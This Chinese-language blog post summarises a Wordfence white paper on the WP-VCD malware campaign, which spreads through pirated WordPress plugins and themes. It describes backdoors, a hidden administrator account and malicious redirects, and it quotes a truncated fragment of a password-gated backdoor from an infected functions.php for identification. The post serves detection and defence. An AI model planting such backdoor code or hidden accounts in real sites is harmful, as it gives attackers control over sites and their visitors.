最近幾周,WordPress生態(tài)系統(tǒng)面臨的最普遍的惡意軟件感染之一稱為WP-VCD運(yùn)動(dòng)。盡管該活動(dòng)存在相對(duì)較長(zhǎng)的時(shí)間,但自2019年8月以來(lái),Wordfence威脅情報(bào)團(tuán)隊(duì)每周都將WP-VCD與新感染率相關(guān)聯(lián),這一趨勢(shì)比任何其他WordPress惡意軟件都要高,并且該活動(dòng)沒有絲毫放緩的跡象。
在今天的文章中,我們將發(fā)布分析WP-VCD的綜合白皮書。本白皮書包含了我們對(duì)這一流行運(yùn)動(dòng)的研究工作的全部細(xì)節(jié)。它可以作為威脅分析人員、安全研究人員、WordPress開發(fā)人員和管理員以及對(duì)跟蹤或阻止與WP-VCD相關(guān)的行為感興趣的其他人員的資源。
WP-VCD簡(jiǎn)介
WP-VCD感染本身通過(guò)“免費(fèi)”或盜版的插件和主題傳播,這些插件和主題由相關(guān)站點(diǎn)的網(wǎng)絡(luò)分發(fā),并且一旦部署,它的傳播方式就非常引人注目。在幕后,大量的命令和控制(C2)基礎(chǔ)結(jié)構(gòu)以及自我修復(fù)感染使攻擊者能夠在這些感染站點(diǎn)上保持立足之地,非常難清理!
WordPress大學(xué)呼吁:請(qǐng)不要再使用盜版和所謂“免費(fèi)”的高級(jí)主題和插件,否則很容易就感染這樣惡意代碼,得不償失!
WP-VCD通過(guò)修改 WordPress 核心文件并在/wp-includes目錄中添加新文件,WP-VCD惡意軟件在WordPress站點(diǎn)中創(chuàng)建了后門。注入惡意軟件后,它會(huì)在WordPress后臺(tái)上秘密創(chuàng)建一個(gè)用戶名為“100010010”的管理員賬戶。這樣一來(lái),它便可以訪問您的網(wǎng)站,然后可以注入更多的惡意代碼以供以后濫用。
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '2f3ad13e4908141130e292bf8aa67474'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))上面的代碼段來(lái)自受WP-VCD感染的站點(diǎn)上的受感染的functions.php文件。由于該活動(dòng)的普遍性,具有處理WordPress惡意軟件感染經(jīng)驗(yàn)的任何人都可以根據(jù)這個(gè)示例代碼來(lái)識(shí)別是否被WP-VCD感染。
完整報(bào)告中包含WP-VCD活動(dòng)的詳細(xì)信息和代碼分析。
基礎(chǔ)架構(gòu)、盈利和歸因
在其歷史的各個(gè)階段,已經(jīng)添加了特定功能并從惡意軟件中刪除了特定功能,但是WP-VCD的大多數(shù)核心組件仍然保持一致。獲利主要來(lái)自兩個(gè)方面:旨在通過(guò)黑帽SEO操縱搜索引擎結(jié)果的病毒式營(yíng)銷活動(dòng),以及為瀏覽受感染網(wǎng)站的用戶創(chuàng)建潛在危險(xiǎn)的重定向和彈出廣告的惡意代碼。
在白皮書中,我們對(duì)WP-VCD的基礎(chǔ)架構(gòu)和貨幣化方案的范圍提供了一些見解。我們還將揭示數(shù)據(jù),這些數(shù)據(jù)可歸因于戰(zhàn)役背后的威脅參與者。
妥協(xié)指標(biāo)(IOC)
為了幫助安全界預(yù)防,發(fā)現(xiàn)和根除WP-VCD感染,我們提供了與此活動(dòng)相關(guān)的IOC的詳盡列表。我們還共享了一些與YARA兼容的惡意軟件檢測(cè)規(guī)則,供公眾使用以識(shí)別受感染的站點(diǎn)。
閱讀完整報(bào)告
我們對(duì)WP-VCD進(jìn)行調(diào)查的全部范圍遠(yuǎn)遠(yuǎn)超出了典型的研究博客文章的范圍,因此,請(qǐng)閱讀完整的白皮書:WP-VCD:您在自己的網(wǎng)站上安裝的惡意軟件。
鳴謝:Mikey Veenstra的WP-VCD白皮書。由Sean Murphy和Ramuel Gall編輯。
更多近期出現(xiàn)的安全漏洞問題,請(qǐng)看《WordPress主題插件相關(guān)漏洞匯總(2019年11月)》
相關(guān)閱讀:
